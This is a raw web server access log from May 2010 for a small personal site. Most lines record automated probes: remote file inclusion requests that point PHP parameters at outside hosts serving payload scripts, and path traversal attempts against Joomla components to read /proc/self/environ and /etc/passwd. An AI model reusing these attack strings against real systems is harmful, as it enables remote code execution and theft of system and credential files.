76.180.26.222 - - [24/May/2010:23:07:29 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.180.26.222 - - [24/May/2010:23:07:41 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.180.26.222 - - [24/May/2010:23:07:41 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.180.26.222 - - [24/May/2010:23:07:41 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.180.26.222 - - [24/May/2010:23:07:41 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
118.129.167.63 - - [24/May/2010:23:10:48 -0500] "GET /logs/access_log.1273017600%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.to-love.fr/cache/page/fx29id1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
195.9.14.148 - - [24/May/2010:23:11:18 -0500] "GET //index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-""Mozilla/5.0"
195.9.14.148 - - [24/May/2010:23:11:18 -0500] "GET //index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-""libwww-perl/5.822"
195.9.14.148 - - [24/May/2010:23:11:18 -0500] "GET //index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-"""
195.9.14.148 - - [24/May/2010:23:11:18 -0500] "GET //index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-"""
195.9.14.148 - - [24/May/2010:23:11:21 -0500] "GET /logs//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-""Mozilla/5.0"
195.9.14.148 - - [24/May/2010:23:11:21 -0500] "GET /logs//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-""libwww-perl/5.822"
195.9.14.148 - - [24/May/2010:23:11:21 -0500] "GET /logs//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-"""
195.9.14.148 - - [24/May/2010:23:11:22 -0500] "GET /logs//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-"""
195.9.14.148 - - [24/May/2010:23:11:24 -0500] "GET /logs/access_log.1271548800//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""Mozilla/5.0"
195.9.14.148 - - [24/May/2010:23:11:24 -0500] "GET /logs/access_log.1271548800//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""libwww-perl/5.822"
195.9.14.148 - - [24/May/2010:23:11:25 -0500] "GET /logs/access_log.1271548800//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-"""
195.9.14.148 - - [24/May/2010:23:11:25 -0500] "GET /logs/access_log.1271548800//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-"""
87.250.255.243 - - [24/May/2010:23:12:09 -0500] "GET /logs/access_log.1260576000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.78.118.123 - - [24/May/2010:23:13:55 -0500] "GET /logs/access_log.1262563200//Forums/admin/admin_words.php?phpbb_root_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 340 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:13:55 -0500] "GET //Forums/admin/admin_words.php?phpbb_root_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:13:56 -0500] "GET /logs//Forums/admin/admin_words.php?phpbb_root_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:13:56 -0500] "GET /logs/access_log.1264032000//Forums/admin/admin_words.php?phpbb_root_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 340 "-""Mozilla/5.0"
65.55.2.140 - - [24/May/2010:23:14:07 -0500] "GET /logs/access_log.1195257600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [24/May/2010:23:14:37 -0500] "GET /logs/access_log.1234915200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.78.118.123 - - [24/May/2010:23:15:06 -0500] "GET /logs/access_log.1262563200//Forums/admin/admin_words.php?phpbb_root_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 340 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:15:06 -0500] "GET //Forums/admin/admin_words.php?phpbb_root_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:15:06 -0500] "GET /logs//Forums/admin/admin_words.php?phpbb_root_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:15:12 -0500] "GET /logs/access_log.1264032000//Forums/admin/admin_words.php?phpbb_root_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 340 "-""Mozilla/5.0"
87.250.255.243 - - [24/May/2010:23:15:25 -0500] "GET /logs/access_log.1236729600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
64.27.53.238 - - [24/May/2010:23:19:26 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
64.27.53.238 - - [24/May/2010:23:19:26 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
64.27.53.238 - - [24/May/2010:23:19:26 -0500] "GET /logs/access_log.1270771200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
64.27.53.238 - - [24/May/2010:23:19:35 -0500] "GET /logs/access_log.1272412800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
87.250.255.243 - - [24/May/2010:23:19:47 -0500] "GET /logs/access_log.1274400000 HTTP/1.1" 200 601189 "-""Yandex/1.01.001 (compatible; Win16; I)"
64.27.53.238 - - [24/May/2010:23:19:49 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
64.27.53.238 - - [24/May/2010:23:19:49 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
64.27.53.238 - - [24/May/2010:23:19:49 -0500] "GET /logs/access_log.1270771200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
64.27.53.238 - - [24/May/2010:23:19:58 -0500] "GET /logs/access_log.1272412800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
87.250.255.243 - - [24/May/2010:23:23:22 -0500] "GET /logs/access_log.1222041600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [24/May/2010:23:29:56 -0500] "GET /logs/access_log.1184976000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.78.118.123 - - [24/May/2010:23:32:24 -0500] "GET /logs/bbs//skin/happycast_category_lightblack/error.php?dir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 338 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:32:24 -0500] "GET /bbs//skin/happycast_category_lightblack/error.php?dir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 333 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:32:25 -0500] "GET /logs/access_log.1274313600/bbs//skin/happycast_category_lightblack/error.php?dir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:32:30 -0500] "GET /logs/access_log.1274313600/bbs//skin/happycast_category_lightblack/error.php?dir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:32:30 -0500] "GET /bbs//skin/happycast_category_lightblack/error.php?dir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 333 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:32:30 -0500] "GET /logs/bbs//skin/happycast_category_lightblack/error.php?dir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 338 "-""Mozilla/5.0"
207.46.13.54 - - [24/May/2010:23:33:01 -0500] "GET /logs/access_log.1228435200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [24/May/2010:23:33:15 -0500] "GET /logs/access_log.1229472000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.78.118.123 - - [24/May/2010:23:33:43 -0500] "GET /logs/access_log.1273622400//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:33:43 -0500] "GET //skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 316 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:33:43 -0500] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.254.228.146 - - [24/May/2010:23:34:00 -0500] "GET /logs/access_log.1271548800//?sourcedir=http://www.stnicholasprimaryschool.org.uk/images/stories/fruit/id1.txt????? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.254.228.146 - - [24/May/2010:23:34:00 -0500] "GET /logs//?sourcedir=http://www.stnicholasprimaryschool.org.uk/images/stories/fruit/id1.txt????? HTTP/1.1" 200 6913 "-""Mozilla/5.0"
121.254.228.146 - - [24/May/2010:23:34:00 -0500] "GET //?sourcedir=http://www.stnicholasprimaryschool.org.uk/images/stories/fruit/id1.txt????? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
121.254.228.146 - - [24/May/2010:23:34:01 -0500] "GET /logs/access_log.1271548800//?sourcedir=http://www.stnicholasprimaryschool.org.uk/images/stories/fruit/id1.txt????? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.254.228.146 - - [24/May/2010:23:34:01 -0500] "GET //?sourcedir=http://www.stnicholasprimaryschool.org.uk/images/stories/fruit/id1.txt????? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
121.254.228.146 - - [24/May/2010:23:34:02 -0500] "GET /logs//?sourcedir=http://www.stnicholasprimaryschool.org.uk/images/stories/fruit/id1.txt????? HTTP/1.1" 200 6913 "-""Mozilla/5.0"
207.46.204.178 - - [24/May/2010:23:34:31 -0500] "GET /artwork/mobiles.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.78.118.123 - - [24/May/2010:23:35:04 -0500] "GET //skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 316 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:35:04 -0500] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:35:04 -0500] "GET /logs/access_log.1273622400//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
87.250.255.243 - - [24/May/2010:23:38:37 -0500] "GET /logs/access_log.1253404800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.78.118.123 - - [24/May/2010:23:40:11 -0500] "GET //skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 316 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:40:12 -0500] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:40:12 -0500] "GET /logs/access_log.1273622400%20%20//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 345 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:40:21 -0500] "GET /logs/access_log.1273622400%20%20//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 345 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:40:21 -0500] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:40:21 -0500] "GET //skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 316 "-""Mozilla/5.0"
195.9.14.148 - - [24/May/2010:23:41:31 -0500] "GET /logs/access_log.1270598400//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""Mozilla/5.0"
195.9.14.148 - - [24/May/2010:23:41:31 -0500] "GET /logs/access_log.1270598400//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""libwww-perl/5.822"
195.9.14.148 - - [24/May/2010:23:41:32 -0500] "GET /logs/access_log.1270598400//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-"""
195.9.14.148 - - [24/May/2010:23:41:32 -0500] "GET /logs/access_log.1270598400//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-"""
186.28.232.13 - - [24/May/2010:23:41:48 -0500] "GET /logs/access_log.1205107200//administrator/index2.php?mosConfig_absolute_path=http://www.mantisowh.be/images/fuck.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
186.28.232.13 - - [24/May/2010:23:41:49 -0500] "GET //administrator/index2.php?mosConfig_absolute_path=http://www.mantisowh.be/images/fuck.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
186.28.232.13 - - [24/May/2010:23:41:49 -0500] "GET /logs//administrator/index2.php?mosConfig_absolute_path=http://www.mantisowh.be/images/fuck.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
200.175.239.226 - - [24/May/2010:23:43:22 -0500] "GET /?dir[func]=&dir[base]=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
200.175.239.226 - - [24/May/2010:23:43:22 -0500] "GET /logs/?dir[func]=&dir[base]=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 200 6908 "-""Mozilla/5.0"
200.175.239.226 - - [24/May/2010:23:43:22 -0500] "GET /logs/access_log.1270857600/?dir[func]=&dir[base]=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:43:26 -0500] "GET /logs/access_log.1271548800/bbs//skin/happycast_category_lightblack/error.php?dir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
200.175.239.226 - - [24/May/2010:23:43:47 -0500] "GET /logs/access_log.1270857600/?dir[func]=&dir[base]=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.175.239.226 - - [24/May/2010:23:43:47 -0500] "GET /logs/access_log.1271894400/?dir[func]=&dir[base]=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.175.239.226 - - [24/May/2010:23:43:47 -0500] "GET /logs/?dir[func]=&dir[base]=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 200 6908 "-""Mozilla/5.0"
200.175.239.226 - - [24/May/2010:23:43:47 -0500] "GET /?dir[func]=&dir[base]=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
213.202.242.101 - - [24/May/2010:23:43:52 -0500] "GET /index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
213.202.242.101 - - [24/May/2010:23:43:52 -0500] "GET /logs/index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""-"
213.202.242.101 - - [24/May/2010:23:43:52 -0500] "GET /index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
213.202.242.101 - - [24/May/2010:23:43:52 -0500] "GET /logs/index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 298 "-""-"
121.78.118.123 - - [24/May/2010:23:43:58 -0500] "GET /logs/access_log.1271548800/bbs//skin/happycast_category_lightblack/error.php?dir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:44:14 -0500] "GET /logs/access_log.1270512000/bbs//skin/happycast_category_lightblack/error.php?dir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:44:33 -0500] "GET /logs/access_log.1270512000/bbs//skin/happycast_category_lightblack/error.php?dir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
87.250.255.243 - - [24/May/2010:23:44:54 -0500] "GET /logs/access_log.1213660800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
187.45.193.159 - - [24/May/2010:23:45:06 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
187.45.193.159 - - [24/May/2010:23:45:07 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.175.239.226 - - [24/May/2010:23:46:36 -0500] "GET /?dir[func]=&dir[base]=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
200.175.239.226 - - [24/May/2010:23:46:36 -0500] "GET /logs/access_log.1270857600/?dir[func]=&dir[base]=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.175.239.226 - - [24/May/2010:23:46:36 -0500] "GET /logs/?dir[func]=&dir[base]=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 200 6908 "-""Mozilla/5.0"
200.175.239.226 - - [24/May/2010:23:46:36 -0500] "GET /logs/access_log.1271894400/?dir[func]=&dir[base]=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:47:19 -0500] "GET /logs/access_log.1273622400%20%20//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 345 "-""Mozilla/5.0"
121.78.118.123 - - [24/May/2010:23:48:53 -0500] "GET /logs/access_log.1273622400%20%20//skin/board/moviefl/download.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 345 "-""Mozilla/5.0"
207.46.13.47 - - [24/May/2010:23:53:01 -0500] "GET /logs/access_log.1167091200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.191.94.188 - - [24/May/2010:23:54:40 -0500] "GET //galeria.php?start=0&kategoria=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
88.191.94.188 - - [24/May/2010:23:54:40 -0500] "GET /logs/access_log.1271548800//galeria.php?start=0&kategoria=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
88.191.94.188 - - [24/May/2010:23:54:40 -0500] "GET /logs//galeria.php?start=0&kategoria=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
91.142.208.158 - - [24/May/2010:23:55:29 -0500] "GET /logs/access_log.1205107200//administrator/index2.php?mosConfig_absolute_path=http://www.mantisowh.be/images/fuck.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
91.142.208.158 - - [24/May/2010:23:55:29 -0500] "GET //administrator/index2.php?mosConfig_absolute_path=http://www.mantisowh.be/images/fuck.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
91.142.208.158 - - [24/May/2010:23:55:30 -0500] "GET /logs//administrator/index2.php?mosConfig_absolute_path=http://www.mantisowh.be/images/fuck.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
77.222.56.62 - - [24/May/2010:23:57:04 -0500] "GET //twindow_notice.php?shop_this_skin_path=http://pkill.interfree.it/id.jpg? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
77.222.56.62 - - [24/May/2010:23:57:04 -0500] "GET /logs//twindow_notice.php?shop_this_skin_path=http://pkill.interfree.it/id.jpg? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
69.175.61.122 - - [24/May/2010:23:57:56 -0500] "GET /logs/index2.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
69.175.61.122 - - [24/May/2010:23:57:56 -0500] "GET /index2.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
67.210.123.70 - - [24/May/2010:23:57:57 -0500] "GET /logs/index2.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.819"
67.210.123.70 - - [24/May/2010:23:57:57 -0500] "GET /index2.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.819"
67.227.143.132 - - [24/May/2010:23:57:57 -0500] "GET /logs/index2.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.227.143.132 - - [24/May/2010:23:57:58 -0500] "GET /index2.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
91.211.113.71 - - [24/May/2010:23:58:00 -0500] "GET /logs/index2.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.211.113.71 - - [24/May/2010:23:58:01 -0500] "GET /index2.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
87.250.255.243 - - [24/May/2010:23:58:01 -0500] "GET /logs/access_log.1220572800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.175.61.122 - - [24/May/2010:23:58:02 -0500] "GET /logs/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
69.175.61.122 - - [24/May/2010:23:58:02 -0500] "GET /index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
174.121.59.218 - - [24/May/2010:23:58:05 -0500] "GET /logs/index2.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
174.121.59.218 - - [24/May/2010:23:58:05 -0500] "GET /index2.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
91.211.113.71 - - [24/May/2010:23:58:06 -0500] "GET /logs/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
91.211.113.71 - - [24/May/2010:23:58:06 -0500] "GET /index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
72.55.146.200 - - [24/May/2010:23:59:48 -0500] "GET /logs/access_log.1205107200//administrator/index2.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
72.55.146.200 - - [24/May/2010:23:59:48 -0500] "GET /logs//administrator/index2.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
72.55.146.200 - - [24/May/2010:23:59:49 -0500] "GET //administrator/index2.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
72.55.146.200 - - [25/May/2010:00:03:28 -0500] "GET /logs/access_log.1212451200//administrator/index2.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
72.55.146.200 - - [25/May/2010:00:03:28 -0500] "GET /logs//administrator/index2.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
72.55.146.200 - - [25/May/2010:00:03:29 -0500] "GET //administrator/index2.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
207.46.199.183 - - [25/May/2010:00:04:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.54.63.138 - - [25/May/2010:00:06:16 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.54.63.138 - - [25/May/2010:00:06:16 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
69.175.61.122 - - [25/May/2010:00:06:57 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
69.175.61.122 - - [25/May/2010:00:06:57 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
174.121.59.218 - - [25/May/2010:00:06:59 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
